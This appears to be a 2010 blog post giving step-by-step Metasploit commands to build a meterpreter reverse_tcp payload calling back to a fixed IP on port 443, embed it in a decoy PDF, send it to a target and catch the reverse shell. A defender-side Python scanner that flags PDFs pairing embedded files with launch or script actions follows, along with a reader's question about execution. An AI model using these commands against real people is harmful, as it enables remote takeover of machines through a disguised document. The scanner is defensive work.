Thursday, May 13, 2010

Client-side Attack by Using Evil PDF

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe


Step 2: Create an evil pdf

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit

Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory

Result: /tmp/BestComputerGuide.pdf

Step 3: Send the evil pdf file to your client

Step 4: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
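A defender-side counterpart, added here and not part of the original post: a small Python scanner that flags PDFs carrying the constructs an embedded-executable PDF of this kind depends on, an /EmbeddedFile stream paired with a /Launch (or /JavaScript) action, and that still finds the action when it is hidden in a Flate-compressed stream. The sample PDFs are constructed inline and are not real exploit files; that the module's output combines an embedded file with a launch action is stated as an assumption about the format, not taken from the post.

```python
import re
import zlib

# PDF name objects that mark the constructs an embedded-executable PDF is assumed
# to rely on: an attachment plus an action that runs or scripts it.
SUSPICIOUS_NAMES = (b"/EmbeddedFile", b"/Launch", b"/JavaScript", b"/OpenAction", b"/AA")
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\nendstream", re.DOTALL)


def _inflate_streams(data: bytes) -> bytes:
    """Raw bytes plus the body of every stream that inflates as FlateDecode."""
    parts = [data]
    for m in STREAM_RE.finditer(data):
        try:
            parts.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # uncompressed or non-Flate stream: the raw scan already covers it
    return b"\n".join(parts)


def scan_pdf(data: bytes) -> dict:
    """Count each suspicious name object, looking inside inflatable streams too."""
    body = _inflate_streams(data)
    # the lookahead stops /EmbeddedFile from also matching the /EmbeddedFiles name tree
    return {n.decode(): len(re.findall(re.escape(n) + rb"(?![A-Za-z])", body)) for n in SUSPICIOUS_NAMES}


def verdict(hits: dict) -> str:
    """An attachment paired with a launch or script action is the pattern to alert on."""
    if hits["/EmbeddedFile"] and (hits["/Launch"] or hits["/JavaScript"]):
        return "suspicious"
    return "review" if any(hits.values()) else "clean"


# Constructed samples (not real exploit files): an attachment plus a /Launch action
# in the clear, the same action hidden in a Flate-compressed stream, and a clean PDF.
EVIL_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 3 0 R"
            b" /Names << /EmbeddedFiles << /Names [(payload.exe) 2 0 R] >> >> >> endobj\n"
            b"2 0 obj << /Type /EmbeddedFile /Length 2 >> stream\nMZ\nendstream endobj\n"
            b"3 0 obj << /Type /Action /S /Launch /F (payload.exe) >> endobj\n%%EOF\n")
_ACTION = zlib.compress(b"<< /Type /Action /S /Launch /F (payload.exe) >>")
HIDDEN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /EmbeddedFile /Length 0 >> stream\n\nendstream endobj\n"
              b"2 0 obj << /Length " + str(len(_ACTION)).encode() + b" /Filter /FlateDecode >> stream\n"
              + _ACTION + b"\nendstream endobj\n%%EOF\n")
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    for label, pdf in (("evil", EVIL_PDF), ("hidden", HIDDEN_PDF), ("clean", CLEAN_PDF)):
        hits = scan_pdf(pdf)
        print(f"{label}: {verdict(hits)} {hits}")
```

The scanner is a triage aid, not a parser: object streams, encryption and exotic filters can still hide names from it, so a "clean" result means only that nothing obvious was found.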

1 comment:

  1. Thanks for this post but I have some doubt:
    What is the use of set EXENAME in BestComputerGuide.pdf here?
    If someone opens BestComputerGuide.pdf then would it execute "payload.exe"?
    Correct me here if I am wrong:
    Click on BestComputerGuide.pdf -> It will ask to save "Report.pdf" -> After saving it, when I open "Report.pdf" nothing will happen. How to execute payload.exe?
